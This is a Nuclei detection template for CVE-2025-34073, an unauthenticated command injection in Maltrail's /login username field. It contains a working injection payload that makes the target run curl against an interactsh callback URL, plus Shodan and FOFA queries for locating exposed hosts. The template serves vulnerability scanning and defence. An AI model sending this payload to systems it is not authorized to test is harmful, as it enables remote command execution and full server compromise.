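id: CVE-2025-34073

# Nuclei HTTP template: checks a Maltrail instance for the unauthenticated
# OS command injection in the `username` field of POST /login (fixed in 0.55
# according to the remediation text below).
#
# How the check decides: it sends one request whose username value asks the
# target to fetch an interactsh URL, then reports a finding only when BOTH
# matchers hold (response headers mention "Maltrail" AND an out-of-band
# interaction was recorded).
info:
  name: Maltrail <=0.54 Username Parameter - Remote Command Execution
  author: SeungAh-Hong
  severity: critical
  description: |
    Maltrail versions <=0.54 are affected by OS command injection. A remote attacker can execute arbitrary operating system commands via the username parameter in a POST request to the /login endpoint.
  impact: |
    Unauthenticated attackers can execute arbitrary operating system commands through the username parameter in the login endpoint, achieving complete server compromise.
  remediation: |
    Upgrade Maltrail to version 0.55 or later, which properly sanitizes user input in authentication handling.
  reference:
    - https://huntr.com/bounties/be3c5204-fbd9-448d-b97c-96a8d2941e87
    - https://vulncheck.com/advisories/stamparm-maltrail-rce
    - https://github.com/stamparm/maltrail/issues/19146
    - https://raw.githubusercontent.com/rapid7/metasploit-framework/master/modules/exploits/unix/http/maltrail_rce.rb
  # Lets scan output and downstream tooling key the finding on the CVE/CWE.
  # CWE-78 follows from the description (OS command injection).
  # NOTE(review): cvss-metrics / cvss-score are not stated on this page; fill
  # them in from the CVE record rather than guessing.
  classification:
    cve-id: CVE-2025-34073
    cwe-id: CWE-78
  metadata:
    max-request: 1
    shodan-query: 'http.title:"Maltrail"'
    fofa-query: 'app="Maltrail"'
  tags: cve,cve2025,maltrail,rce,unauth,oss,vuln

http:
  - raw:
      # The blank line before the body is required: it separates the HTTP
      # headers from the form-encoded body.
      # Detection hint for defenders: the request is a POST to /login whose
      # username value carries shell metacharacters (`;` and backticks), which
      # a legitimate username has no reason to contain.
      - |
        POST /login HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        username=;`curl http://{{interactsh-url}}`

    matchers:
      # Both expressions must be true (condition: and).
      #  1. The response headers contain "Maltrail", tying the callback to a
      #     Maltrail responder rather than an arbitrary host.
      #  2. An HTTP or DNS interaction reached the interactsh server.
      # Caveats for triage:
      #  - A DNS-only interaction is weaker evidence than an HTTP one, since a
      #    name lookup can be triggered by intermediaries that inspect request
      #    bodies; confirm with the installed Maltrail version.
      #  - No interaction does not prove the host is patched: outbound
      #    HTTP/DNS from the sensor may simply be filtered, or curl may be
      #    absent. Verify the version directly in that case.
      - type: dsl
        dsl:
          - 'contains(header, "Maltrail")'
          - "contains(interactsh_protocol, 'http') || contains(interactsh_protocol, 'dns')"
        condition: and

# NOTE(review): the digest below was issued for the template as originally
# signed. Any edit to this file (including added comments or fields) makes it
# stale; re-sign the template (`nuclei -sign`) before relying on signature
# verification.
# digest: 4a0a0047304502202ecfc46f9715df9ea2d1e1c24d6e61dd1147aacbb654b347ee95a431976cdde002210086f1ffbbecb107c38ea162d3d31cdafebf98bc4e471a283e61597ef68c35c1c1:922c64590222798bb761d5b6d8e72950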